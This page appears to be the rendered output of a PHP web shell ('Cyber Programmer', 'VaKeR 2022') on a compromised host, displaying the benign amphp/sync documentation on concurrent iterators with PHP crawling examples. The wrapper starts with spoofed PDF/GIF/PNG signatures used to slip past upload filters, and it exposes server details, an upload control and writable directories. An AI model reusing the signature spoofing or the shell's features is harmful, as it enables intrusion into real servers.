%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/admin1/vendor/amphp/sync/docs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/admin1/vendor/amphp/sync/docs/concurrent-iterator.md
---
title: Concurrent Iterators
permalink: /concurrent-iterator
---
As already stated in the [preamble of our documentation](https://amphp.org/amp/), the weak link when managing concurrency is humans; so `amphp/sync` provides abstractions to hide the complexity of concurrent iteration.

## Concurrency Approaches

Given you have a list of URLs you want to crawl, let's discuss a few possible approaches. For simplicity, we will assume a `fetch` function already exists, which takes a URL and returns the HTTP status code (which is everything we want to know for these examples).

### Approach 1: Sequential

Simple loop using non-blocking I/O, but no concurrency while fetching the individual URLs; starts the second request as soon as the first completed.

```php
$urls = [...];

Amp\call(function () use ($urls) {
    $results = [];

    foreach ($urls as $url) {
        // always wait for the promise to resolve before fetching the next one
        $statusCode = yield fetch($url);
        $results[$url] = $statusCode;
    }
    
    return $results;
});
```

### Approach 2: Everything Concurrently

Almost the same loop, but awaiting all promises at once; starts all requests immediately. Might not be feasible with too many URLs.

```php
$urls = [...];

Amp\call(function () use ($urls) {
    $results = [];

    foreach ($urls as $url) {
        // note the missing yield, we're adding the promises to the array
        $statusCodePromise = fetch($url);
        $results[$url] = $statusCodePromise;
    }

    // yielding an array of promises awaits them all at once
    $results = yield $results;
    
    return $results;
});
```

### Approach 3: Concurrent Chunks

Splitting the jobs into chunks of ten; all requests within a chunk are made concurrently, but each chunk sequentially, so the timing for each chunk depends on the slowest response; starts the eleventh request as soon as the first ten requests completed.

```php
$urls = [...];

Amp\call(function () use ($urls) {
    $results = [];

    foreach (\array_chunk($urls, 10) as $chunk) {
        $promises = [];

        foreach ($chunk as $url) {
            // note the missing yield, we're adding the promises to the array
            $statusCodePromise = fetch($url);
            $promises[$url] = $statusCodePromise;
        }

        // yielding an array of promises awaits them all at once
        $results = \array_merge($results, yield $promises);
    }
    
    return $results;
});
```

### Approach 4: Concurrent Iterator

Concurrent iteration, keeping the concurrency at a maximum of ten; starts the eleventh request as soon as any of the first ten requests completes.

```php
$urls = [...];

Amp\call(function () use ($urls) {
    $results = [];

    yield Amp\Sync\ConcurrentIterator\each(
        Amp\Iterator\fromIterable($urls),
        new Amp\Sync\LocalSemaphore(10),
        function (string $url) use (&$results) {
            $statusCode = yield fetch($url);
            $results[$url] = $statusCode;
        }
    );

    return $results;
});
```

## Provided APIs

### `Amp\Sync\ConcurrentIterator\each`

Calls `$processor` for each item in the iterator while acquiring a lock from `$semaphore` during each operation.
The returned `Promise` resolves as soon as the iterator is empty and all operations are completed.

Use `LocalSemaphore` if you don't need to synchronize beyond a single process.

```php
function each(Iterator $iterator, Semaphore $semaphore, callable $processor): Promise
{
    // ...
}
```

### `Amp\Sync\ConcurrentIterator\map`

Calls `$processor` for each item in the iterator while acquiring a lock from `$semaphore` during each operation.
Returns a new `Iterator` instance with the return values of `$processor`.
 
Use `LocalSemaphore` if you don't need to synchronize beyond a single process.

```php
function map(Iterator $iterator, Semaphore $semaphore, callable $processor): Iterator
{
    // ...
}
```

### `Amp\Sync\ConcurrentIterator\filter`

Calls `$filter` for each item in the iterator while acquiring a lock from `$semaphore` during each operation.
Returns a new `Iterator` instance with the original values where `$filter` resolves to `true`.
 
Use `LocalSemaphore` if you don't need to synchronize beyond a single process.

```php
function filter(Iterator $iterator, Semaphore $semaphore, callable $filter): Iterator
{
    // ...
}
```

### `Amp\Sync\ConcurrentIterator\transform`

Calls `$processor` for each item in the iterator while acquiring a lock from `$semaphore` during each operation.
`$processor` receives the current element and an `$emit` callable as arguments.

This function can be used to implement additional concurrent iteration functions and is the base for `map`, `filter`, and `each`. 

Use `LocalSemaphore` if you don't need to synchronize beyond a single process.

```php
function transform(Iterator $iterator, Semaphore $semaphore, callable $processor): Iterator
{
    // ...
}
```

VaKeR 2022